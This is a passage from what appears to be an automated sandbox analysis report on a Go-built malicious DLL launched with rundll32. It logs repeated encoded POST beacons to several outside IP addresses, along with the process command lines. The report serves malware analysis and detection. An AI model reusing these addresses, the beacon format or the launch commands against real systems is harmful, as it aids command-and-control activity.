        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:31:23 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        13192.168.2.449754195.2.70.38807020C:\Windows\SysWOW64\rundll32.exe
        TimestampBytes transferredDirectionData
        Aug 9, 2024 19:31:23.045965910 CEST293OUTPOST / HTTP/1.1
        Host: 195.2.70.38
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: QhzyDspD
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:31:23.778482914 CEST183INHTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:31:23 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        14192.168.2.44975591.142.74.28807100C:\Windows\SysWOW64\rundll32.exe
        TimestampBytes transferredDirectionData
        Aug 9, 2024 19:31:23.670452118 CEST294OUTPOST / HTTP/1.1
        Host: 91.142.74.28
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: jc0iQUxH
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:31:24.374453068 CEST183INHTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:31:24 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        15192.168.2.44975691.142.74.28807020C:\Windows\SysWOW64\rundll32.exe
        TimestampBytes transferredDirectionData
        Aug 9, 2024 19:31:23.790730953 CEST294OUTPOST / HTTP/1.1
        Host: 91.142.74.28
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: ps278JPe
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:31:24.499926090 CEST183INHTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:31:24 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        16192.168.2.44975777.238.224.56807100C:\Windows\SysWOW64\rundll32.exe
        TimestampBytes transferredDirectionData
        Aug 9, 2024 19:31:24.383058071 CEST295OUTPOST / HTTP/1.1
        Host: 77.238.224.56
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: ng2Esf7E
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:31:25.000452995 CEST183INHTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:31:24 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        17192.168.2.44975877.238.224.56807020C:\Windows\SysWOW64\rundll32.exe
        TimestampBytes transferredDirectionData
        Aug 9, 2024 19:31:24.508050919 CEST295OUTPOST / HTTP/1.1
        Host: 77.238.224.56
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: OBPs4rXv
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:31:25.115820885 CEST183INHTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:31:25 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        18192.168.2.44975977.238.229.63807100C:\Windows\SysWOW64\rundll32.exe
        TimestampBytes transferredDirectionData
        Aug 9, 2024 19:31:25.030198097 CEST295OUTPOST / HTTP/1.1
        Host: 77.238.229.63
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: DDiYiZL9
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:31:25.812309980 CEST165INHTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:31:25 GMT
        Content-Length: 1
        Data Raw: 0a
        Data Ascii:


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        19192.168.2.44976077.238.229.63807020C:\Windows\SysWOW64\rundll32.exe
        TimestampBytes transferredDirectionData
        Aug 9, 2024 19:31:25.123140097 CEST295OUTPOST / HTTP/1.1
        Host: 77.238.229.63
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: xrQPCMBk
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:31:25.768892050 CEST183INHTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:31:25 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session IDSource IPSource PortDestination IPDestination Port
        20192.168.2.44976177.238.250.12380
        TimestampBytes transferredDirectionData
        Aug 9, 2024 19:31:26.591015100 CEST296OUTPOST / HTTP/1.1
        Host: 77.238.250.123
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: 9stAvzmg
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:31:27.218018055 CEST183INHTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:31:27 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session IDSource IPSource PortDestination IPDestination Port
        21192.168.2.44976277.238.250.12380
        TimestampBytes transferredDirectionData
        Aug 9, 2024 19:31:26.591090918 CEST296OUTPOST / HTTP/1.1
        Host: 77.238.250.123
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: xpzibzYr
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:31:27.217256069 CEST183INHTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:31:27 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Click to jump to process

        Click to jump to process

        • File
        • Network

        Click to dive into process behavior distribution

        Target ID:0
        Start time:13:28:18
        Start date:09/08/2024
        Path:C:\Windows\System32\loaddll32.exe
        Wow64 process (32bit):true
        Commandline:loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll"
        Imagebase:0x140000
        File size:126'464 bytes
        MD5 hash:51E6071F9CBA48E79F10C84515AAE618
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:1
        Start time:13:28:18
        Start date:09/08/2024
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff7699e0000
        File size:862'208 bytes
        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        Target ID:2
        Start time:13:28:18
        Start date:09/08/2024
        Path:C:\Windows\SysWOW64\cmd.exe
        Wow64 process (32bit):true
        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1
        Imagebase:0x240000
        File size:236'544 bytes
        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        Target ID:3
        Start time:13:28:18
        Start date:09/08/2024
        Path:C:\Windows\SysWOW64\rundll32.exe
        Wow64 process (32bit):true
        Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,MainFunc
        Imagebase:0x7f0000
        File size:61'440 bytes
        MD5 hash:889B99C52A60DD49227C5E485A016679
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false
        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

        Target ID:4
        Start time:13:28:18
        Start date:09/08/2024
        Path:C:\Windows\SysWOW64\rundll32.exe
        Wow64 process (32bit):true
        Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1
        Imagebase:0x7f0000
        File size:61'440 bytes
        MD5 hash:889B99C52A60DD49227C5E485A016679
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false
        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

        Target ID:5
        Start time:13:28:21
        Start date:09/08/2024
        Path:C:\Windows\SysWOW64\rundll32.exe
        Wow64 process (32bit):true
        Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,_cgo_dummy_export
        Imagebase:0x7f0000
        File size:61'440 bytes
        MD5 hash:889B99C52A60DD49227C5E485A016679
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:6
        Start time:13:28:32
        Start date:09/08/2024
        Path:C:\Windows\SysWOW64\rundll32.exe
        Wow64 process (32bit):true
        Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",MainFunc
        Imagebase:0x7f0000
        File size:61'440 bytes
        MD5 hash:889B99C52A60DD49227C5E485A016679
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false
        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

        Target ID:7
        Start time:13:28:33
        Start date:09/08/2024
        Path:C:\Windows\SysWOW64\rundll32.exe
        Wow64 process (32bit):true
        Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",_cgo_dummy_export
        Imagebase:0x7f0000
        File size:61'440 bytes
        MD5 hash:889B99C52A60DD49227C5E485A016679
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true
        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

        No disassembly